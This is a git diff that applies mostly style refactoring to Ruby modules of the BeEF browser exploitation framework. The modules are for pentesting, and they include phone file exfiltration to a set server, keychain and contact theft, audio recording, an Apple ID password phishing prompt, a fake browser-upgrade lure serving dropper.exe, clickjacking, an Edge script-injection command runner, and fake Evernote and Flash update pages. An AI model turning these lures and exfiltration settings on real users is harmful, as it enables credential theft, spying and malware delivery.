+7,25 @@ # class Phonegap_file_upload < BeEF::Core::Command - - def self.options - return [{ - 'name' => 'file_upload_dst', - 'description' => 'Upload a file from device to your server', - 'ui_label'=>'Destination', - 'value' => 'http://192.168.9.130/recv-unauth.php', - 'width' => '300px' - },{ - 'name' => 'file_upload_src', - 'description' => 'path to file on device', - 'ui_label'=>'File Path', - 'value' => '/sdcard/myrecording.wav', - 'width' => '300px' - }] + def self.options + [{ + 'name' => 'file_upload_dst', + 'description' => 'Upload a file from device to your server', + 'ui_label' => 'Destination', + 'value' => 'http://192.168.9.130/recv-unauth.php', + 'width' => '300px' + }, { + 'name' => 'file_upload_src', + 'description' => 'path to file on device', + 'ui_label' => 'File Path', + 'value' => '/sdcard/myrecording.wav', + 'width' => '300px' + }] end def callback content = {} content['Result'] = @datastore['result'] save content - - end + end end diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb index 64dca82d9..47f6f7033 100644 --- a/modules/phonegap/phonegap_geo_locate/module.rb +++ b/modules/phonegap/phonegap_geo_locate/module.rb @@ -7,11 +7,9 @@ # class Phonegap_geo_locate < BeEF::Core::Command - - def post_execute + def post_execute content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_globalization_status/module.rb b/modules/phonegap/phonegap_globalization_status/module.rb index 8424ed739..9dacf9574 100644 --- a/modules/phonegap/phonegap_globalization_status/module.rb +++ b/modules/phonegap/phonegap_globalization_status/module.rb @@ -6,10 +6,9 @@ # // Phonegap_globalization_status class Phonegap_globalization_status < BeEF::Core::Command - def post_execute content = {} content['Result'] = @datastore['result'] save content - end + end end diff --git a/modules/phonegap/phonegap_keychain/module.rb b/modules/phonegap/phonegap_keychain/module.rb index 0fc082576..41f2ea078 100644 --- a/modules/phonegap/phonegap_keychain/module.rb +++ b/modules/phonegap/phonegap_keychain/module.rb @@ -7,47 +7,45 @@ # class Phonegap_keychain < BeEF::Core::Command - - def self.options - return [{ - 'name' => 'servicename', - 'description' => 'Service name', - 'ui_label'=>'Service name', - 'value' => 'ServiceNameTest', - 'width' => '300px' - - },{ - 'name' => 'key', - 'description' => 'Key', - 'ui_label'=>'Key', - 'value' => 'TestKey', - 'width' => '300px' - },{ - 'name' => 'value', - 'description' => 'Value', - 'ui_label'=>'Value', - 'value' => 'TestValue', - 'width' => '100px' - },{ - 'name' => 'action', - 'type' => 'combobox', - 'ui_label' => 'Action Type', - 'store_type' => 'arraystore', - 'store_fields' => ['action'], - 'store_data' => [['Read'],['CreateUpdate'],['Delete']], - 'valueField' => 'action', - 'value' => 'CreateUpdate', - editable: false, - 'displayField' => 'action', - 'mode' => 'local', - 'autoWidth' => true - }] + def self.options + [{ + 'name' => 'servicename', + 'description' => 'Service name', + 'ui_label' => 'Service name', + 'value' => 'ServiceNameTest', + 'width' => '300px' + + }, { + 'name' => 'key', + 'description' => 'Key', + 'ui_label' => 'Key', + 'value' => 'TestKey', + 'width' => '300px' + }, { + 'name' => 'value', + 'description' => 'Value', + 'ui_label' => 'Value', + 'value' => 'TestValue', + 'width' => '100px' + }, { + 'name' => 'action', + 'type' => 'combobox', + 'ui_label' => 'Action Type', + 'store_type' => 'arraystore', + 'store_fields' => ['action'], + 'store_data' => [['Read'], ['CreateUpdate'], ['Delete']], + 'valueField' => 'action', + 'value' => 'CreateUpdate', + editable: false, + 'displayField' => 'action', + 'mode' => 'local', + 'autoWidth' => true + }] end def callback content = {} content['Result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_list_contacts/module.rb b/modules/phonegap/phonegap_list_contacts/module.rb index fb96dc68d..9390e70e0 100644 --- a/modules/phonegap/phonegap_list_contacts/module.rb +++ b/modules/phonegap/phonegap_list_contacts/module.rb @@ -6,10 +6,9 @@ # // phonegap_list_contacts class Phonegap_list_contacts < BeEF::Core::Command - def post_execute content = {} content['Result'] = @datastore['result'] save content - end + end end diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb index f5e42770e..a28e1a764 100644 --- a/modules/phonegap/phonegap_list_files/module.rb +++ b/modules/phonegap/phonegap_list_files/module.rb @@ -7,21 +7,19 @@ # class Phonegap_list_files < BeEF::Core::Command - - def self.options - return [{ - 'name' => 'directory', - 'description' => 'List files in this directory', - 'ui_label'=>'Directory', - 'value' => '/', - 'width' => '300px' - }] + def self.options + [{ + 'name' => 'directory', + 'description' => 'List files in this directory', + 'ui_label' => 'Directory', + 'value' => '/', + 'width' => '300px' + }] end def callback content = {} content['Result'] = @datastore['result'] save content - - end + end end diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb index cb6e9a1ed..b3b4500a5 100644 --- a/modules/phonegap/phonegap_persist_resume/module.rb +++ b/modules/phonegap/phonegap_persist_resume/module.rb @@ -6,11 +6,9 @@ # persist on over app's sleep/wake events class Phonegap_persist_resume < BeEF::Core::Command - - def post_execute + def post_execute content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 9a530d414..b6a6dfe66 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -7,20 +7,18 @@ # class Phonegap_persistence < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto beef_host = @configuration.beef_host beef_port = @configuration.beef_port hook_file = @configuration.hook_file_path - return [{ + [{ 'name' => 'hook_url', 'description' => 'The URL of your BeEF hook', - 'ui_label'=>'Hook URL', - 'value' => proto + '://'+beef_host+':'+beef_port+hook_file, + 'ui_label' => 'Hook URL', + 'value' => "#{proto}://#{beef_host}:#{beef_port}#{hook_file}", 'width' => '300px' }] end @@ -29,6 +27,5 @@ class Phonegap_persistence < BeEF::Core::Command content = {} content['result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_plugin_detection/module.rb b/modules/phonegap/phonegap_plugin_detection/module.rb index ae8c6b6df..b461e4299 100644 --- a/modules/phonegap/phonegap_plugin_detection/module.rb +++ b/modules/phonegap/phonegap_plugin_detection/module.rb @@ -10,5 +10,5 @@ class Phonegap_plugin_detection < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content - end + end end diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb index 0400b6321..bf1efe925 100644 --- a/modules/phonegap/phonegap_prompt_user/module.rb +++ b/modules/phonegap/phonegap_prompt_user/module.rb @@ -7,46 +7,44 @@ # class Phonegap_prompt_user < BeEF::Core::Command - - def self.options - return [{ - 'name' => 'title', - 'description' => 'Prompt title', - 'ui_label'=>'Title', - 'value' => 'Apple ID', - 'width' => '300px' - - },{ - 'name' => 'question', - 'description' => 'Prompt question', - 'ui_label'=>'Question', - 'value' => 'Please enter your Apple ID password', - 'width' => '300px' - },{ - 'name' => 'ans_yes', - 'description' => 'Prompt positive answer button label', - 'ui_label'=>'Yes', - 'value' => 'Submit', - 'width' => '100px' - },{ - 'name' => 'ans_no', - 'description' => 'Prompt negative answer button label', - 'ui_label'=>'No', - 'value' => 'Cancel', - 'width' => '100px' - },{ - 'name' => 'text', - 'description' => 'Default text to display', - 'ui_label'=>'Default text', - 'value' => 'Password', - 'width' => '100px' - }] + def self.options + [{ + 'name' => 'title', + 'description' => 'Prompt title', + 'ui_label' => 'Title', + 'value' => 'Apple ID', + 'width' => '300px' + + }, { + 'name' => 'question', + 'description' => 'Prompt question', + 'ui_label' => 'Question', + 'value' => 'Please enter your Apple ID password', + 'width' => '300px' + }, { + 'name' => 'ans_yes', + 'description' => 'Prompt positive answer button label', + 'ui_label' => 'Yes', + 'value' => 'Submit', + 'width' => '100px' + }, { + 'name' => 'ans_no', + 'description' => 'Prompt negative answer button label', + 'ui_label' => 'No', + 'value' => 'Cancel', + 'width' => '100px' + }, { + 'name' => 'text', + 'description' => 'Default text to display', + 'ui_label' => 'Default text', + 'value' => 'Password', + 'width' => '100px' + }] end def callback content = {} content['Result'] = @datastore['result'] save content - end - + end end diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb index ac1fba550..6666eec3b 100644 --- a/modules/phonegap/phonegap_start_record_audio/module.rb +++ b/modules/phonegap/phonegap_start_record_audio/module.rb @@ -7,21 +7,18 @@ # class Phonegap_start_record_audio < BeEF::Core::Command - def self.options - return [ - {'name' => 'file_name', - 'description' => 'File name for audio recording', - 'ui_label' => 'File Name', - 'value' => 'myrecording.wav' - } + [ + { 'name' => 'file_name', + 'description' => 'File name for audio recording', + 'ui_label' => 'File Name', + 'value' => 'myrecording.wav' } ] - end - + end + def post_execute content = {} content['file_name'] = @datastore['file_name'] save content end - end diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb index 0cbc7010a..e437a345d 100644 --- a/modules/phonegap/phonegap_stop_record_audio/module.rb +++ b/modules/phonegap/phonegap_stop_record_audio/module.rb @@ -7,6 +7,4 @@ # class Phonegap_stop_record_audio < BeEF::Core::Command - - end diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb index 0910932b7..7fd42dfd5 100644 --- a/modules/social_engineering/clickjacking/module.rb +++ b/modules/social_engineering/clickjacking/module.rb @@ -5,70 +5,68 @@ # class Clickjacking < BeEF::Core::Command + def self.options + @configuration = BeEF::Core::Configuration.instance + proto = @configuration.beef_proto + beef_host = @configuration.beef_host + beef_port = @configuration.beef_port + base_host = "#{proto}://#{beef_host}:#{beef_port}" - def self.options - @configuration = BeEF::Core::Configuration.instance - proto = @configuration.beef_proto - beef_host = @configuration.beef_host - beef_port = @configuration.beef_port - base_host = "#{proto}://#{beef_host}:#{beef_port}" + uri = "#{base_host}/demos/clickjacking/clickjack_victim.html" - uri = "#{base_host}/demos/clickjacking/clickjack_victim.html" + [ + { 'name' => 'iFrameSrc', 'ui_label' => 'iFrame Src', 'type' => 'textarea', 'value' => uri, 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameSecurityZone', 'ui_label' => 'Security restricted (IE)', 'type' => 'checkbox' }, + { 'name' => 'iFrameSandbox', 'ui_label' => 'Sandbox', 'type' => 'checkbox' }, + { 'name' => 'iFrameVisibility', 'ui_label' => 'Show Attack', 'type' => 'checkbox', 'checked' => 'checked' }, + { 'name' => 'clickDelay', 'ui_label' => 'Click Delay (ms)', 'value' => '300', 'width' => '100px' }, + { 'name' => 'iFrameWidth', 'ui_label' => 'iFrame Width', 'value' => '16', 'width' => '100px' }, + { 'name' => 'iFrameHeight', 'ui_label' => 'iFrame Height', 'value' => '10', 'width' => '100px' }, - return [ - {'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' => uri, 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameSecurityZone', 'ui_label' => 'Security restricted (IE)', 'type' => 'checkbox' }, - {'name' => 'iFrameSandbox', 'ui_label' => 'Sandbox', 'type' => 'checkbox' }, - {'name' => 'iFrameVisibility', 'ui_label' => 'Show Attack', 'type' => 'checkbox', 'checked' => 'checked' }, - {'name' => 'clickDelay', 'ui_label' => 'Click Delay (ms)', 'value' => '300', 'width' => '100px' }, - {'name' => 'iFrameWidth', 'ui_label' => 'iFrame Width', 'value' => '16', 'width' => '100px' }, - {'name' => 'iFrameHeight', 'ui_label' => 'iFrame Height', 'value' => '10', 'width' => '100px' }, + { 'name' => 'Click_1', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 1' }, + { 'name' => 'clickaction_1', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => '$("#overlay1").data("overlay").close();', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_1', 'ui_label' => 'X-pos', 'value' => '20', 'width' => '100px' }, + { 'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '55', 'width' => '100px' }, - {'name' => 'Click_1', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 1' }, - {'name' => 'clickaction_1', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$("#overlay1").data("overlay").close();', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_1', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' }, - {'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '55', 'width'=>'100px' }, + { 'name' => 'Click_2', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 2' }, + { 'name' => 'clickaction_2', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => '$(".more-quotes").trigger("click");', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_2', 'ui_label' => 'X-pos', 'value' => '20', 'width' => '100px' }, + { 'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '135', 'width' => '100px' }, - {'name' => 'Click_2', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 2' }, - {'name' => 'clickaction_2', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$(".more-quotes").trigger("click");', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_2', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' }, - {'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '135', 'width'=>'100px' }, + { 'name' => 'Click_3', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 3' }, + { 'name' => 'clickaction_3', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_3', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_3', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' }, - {'name' => 'Click_3', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 3' }, - {'name' => 'clickaction_3', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_3', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_3', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }, + { 'name' => 'Click_4', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 4' }, + { 'name' => 'clickaction_4', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_4', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_4', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' }, - {'name' => 'Click_4', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 4' }, - {'name' => 'clickaction_4', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_4', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_4', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }, + { 'name' => 'Click_5', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' }, + { 'name' => 'clickaction_5', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_5', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_5', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' }, - {'name' => 'Click_5', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' }, - {'name' => 'clickaction_5', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_5', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_5', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }, + { 'name' => 'Click_6', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' }, + { 'name' => 'clickaction_6', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_6', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_6', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' }, - {'name' => 'Click_6', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' }, - {'name' => 'clickaction_6', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_6', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_6', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }, + { 'name' => 'Click_7', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 7' }, + { 'name' => 'clickaction_7', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_7', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_7', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' }, - {'name' => 'Click_7', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 7' }, - {'name' => 'clickaction_7', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_7', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_7', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }, + { 'name' => 'Click_8', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 8' }, + { 'name' => 'clickaction_8', 'ui_label' => 'JS', 'type' => 'textarea', 'value' => 'void(0)', 'width' => '400px', 'height' => '50px' }, + { 'name' => 'iFrameLeft_8', 'ui_label' => 'X-pos', 'value' => '-', 'width' => '100px' }, + { 'name' => 'iFrameTop_8', 'ui_label' => 'Y-pos', 'value' => '-', 'width' => '100px' } - {'name' => 'Click_8', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 8' }, - {'name' => 'clickaction_8', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'}, - {'name' => 'iFrameLeft_8', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' }, - {'name' => 'iFrameTop_8', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' } - - ] - end - - def post_execute - save({'clickjack' => @datastore['clickjack']}) - end + ] + end + def post_execute + save({ 'clickjack' => @datastore['clickjack'] }) + end end diff --git a/modules/social_engineering/clippy/module.rb b/modules/social_engineering/clippy/module.rb index f49bac7b3..756c71d26 100755 --- a/modules/social_engineering/clippy/module.rb +++ b/modules/social_engineering/clippy/module.rb @@ -4,14 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Clippy < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-bottom.png','/clippy/clippy-speech-bottom','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-mid.png','/clippy/clippy-speech-mid','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-top.png','/clippy/clippy-speech-top','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-main.png','/clippy/clippy-main','png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-bottom.png', '/clippy/clippy-speech-bottom', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-mid.png', '/clippy/clippy-speech-mid', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-top.png', '/clippy/clippy-speech-top', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-main.png', '/clippy/clippy-main', 'png') end - + def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto @@ -19,25 +18,26 @@ class Clippy < BeEF::Core::Command beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - return [ - {'name' =>'clippydir', 'description' =>'Webdir containing clippy images', 'ui_label'=>'Clippy image directory', 'value' => "#{base_host}/clippy/"}, - {'name' =>'askusertext', 'description' =>'Text for speech bubble', 'ui_label'=>'Custom text', 'value' => 'Your browser appears to be out of date. Would you like to upgrade it?'}, - {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => "#{base_host}/dropper.exe"}, - {'name' =>'respawntime', 'description' =>'', 'ui_label'=>'Time until Clippy shows his face again', 'value' => '5000'}, - {'name' =>'thankyoumessage', 'description' =>'Thankyou message after downloading', 'ui_label'=>'Thankyou message after downloading', 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!'} + [ + { 'name' => 'clippydir', 'description' => 'Webdir containing clippy images', 'ui_label' => 'Clippy image directory', 'value' => "#{base_host}/clippy/" }, + { 'name' => 'askusertext', 'description' => 'Text for speech bubble', 'ui_label' => 'Custom text', + 'value' => 'Your browser appears to be out of date. Would you like to upgrade it?' }, + { 'name' => 'executeyes', 'description' => 'Executable to download', 'ui_label' => 'Executable', 'value' => "#{base_host}/dropper.exe" }, + { 'name' => 'respawntime', 'description' => '', 'ui_label' => 'Time until Clippy shows his face again', 'value' => '5000' }, + { 'name' => 'thankyoumessage', 'description' => 'Thankyou message after downloading', 'ui_label' => 'Thankyou message after downloading', + 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!' } ] end - + # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - save({'answer' => @datastore['answer']}) + save({ 'answer' => @datastore['answer'] }) BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-main.png') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-top.png') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-mid.png') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-bottom.png') end - end diff --git a/modules/social_engineering/edge_wscript_wsh_injection/module.rb b/modules/social_engineering/edge_wscript_wsh_injection/module.rb index c212a2328..ec036c7ab 100755 --- a/modules/social_engineering/edge_wscript_wsh_injection/module.rb +++ b/modules/social_engineering/edge_wscript_wsh_injection/module.rb @@ -4,57 +4,53 @@ # See the file 'doc/COPYING' for copying permission # class Edge_wscript_wsh_injection < BeEF::Core::Command - def pre_send payload = '' @datastore.each do |input| - if input['name'] == 'payload' - payload = input['value'] - end + payload = input['value'] if input['name'] == 'payload' end rand_str = rand(32**10).to_s(32) - script = <<-EOF - - + script = <<~EOF + #{' '} + - - + + - + - -EOF + + EOF BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', - { - 'Content-Type' => 'text/html' - }, - script, - "/#{@command_id}/index.html", - -1 - ) + { + 'Content-Type' => 'text/html' + }, + script, + "/#{@command_id}/index.html", + -1) end def self.options - return [ - {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"} + [ + { 'name' => 'payload', 'ui_label' => 'Commands', 'value' => 'calc.exe' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html") end end diff --git a/modules/social_engineering/fake_evernote_clipper/module.rb b/modules/social_engineering/fake_evernote_clipper/module.rb index 7d7732ab7..15e82bcdb 100755 --- a/modules/social_engineering/fake_evernote_clipper/module.rb +++ b/modules/social_engineering/fake_evernote_clipper/module.rb @@ -4,17 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Fake_evernote_clipper < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.html','/ev/login','html') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.css','/ev/login','css') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/clipboard.png','/ev/clipboard','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/close_login.png','/ev/close_login','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/error-clip.png','/ev/error-clip','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/evernote_web_clipper.png','/ev/evernote_web_clipper','png') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Medium.otf','/ev/GothamSSm-Medium','otf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Bold.otf','/ev/GothamSSm-Bold','otf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/core/main/client/lib/jquery-1.12.4.min.js','/ev/jquery','js') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.html', '/ev/login', 'html') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.css', '/ev/login', 'css') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/clipboard.png', '/ev/clipboard', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/close_login.png', '/ev/close_login', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/error-clip.png', '/ev/error-clip', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/evernote_web_clipper.png', '/ev/evernote_web_clipper', 'png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Medium.otf', '/ev/GothamSSm-Medium', 'otf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Bold.otf', '/ev/GothamSSm-Bold', 'otf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/core/main/client/lib/jquery-1.12.4.min.js', '/ev/jquery', 'js') end # @@ -22,7 +21,7 @@ class Fake_evernote_clipper < BeEF::Core::Command # data back to the framework. # def post_execute - if (@datastore['meta'] == "KILLFRAME") + if @datastore['meta'] == 'KILLFRAME' BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/login.html') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/login.css') BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/clipboard.png') @@ -37,5 +36,4 @@ class Fake_evernote_clipper < BeEF::Core::Command content['result'] = @datastore['result'] save content end - end diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb index d9fb1c9e9..51701dbb1 100755 --- a/modules/social_engineering/fake_flash_update/module.rb +++ b/modules/social_engineering/fake_flash_update/module.rb @@ -4,40 +4,34 @@ # See the file 'doc/COPYING' for copying permission # class Fake_flash_update < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_flash_update/img/eng.png', '/adobe/flash_update', 'png') - end - + def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto beef_host = @configuration.beef_host beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" - + image = "#{base_host}/adobe/flash_update.png" - return [ - {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Image', 'value' => image}, - {'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', - 'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'],['Firefox_Extension']], - 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload'}, - {'name' =>'payload_uri', 'description' =>'Custom Payload URI', 'ui_label'=>'Custom Payload URI', - 'value' => "https://github.com/beefproject/beef/archive/master.zip"} + [ + { 'name' => 'image', 'description' => 'Location of image for the update prompt', 'ui_label' => 'Image', 'value' => image }, + { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', + 'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'], ['Firefox_Extension']], + 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload' }, + { 'name' => 'payload_uri', 'description' => 'Custom Payload URI', 'ui_label' => 'Custom Payload URI', + 'value' => 'https://github.com/beefproject/beef/archive/master.zip' } ] end - + def post_execute - content = {} content['result'] = @datastore['result'] save content - - 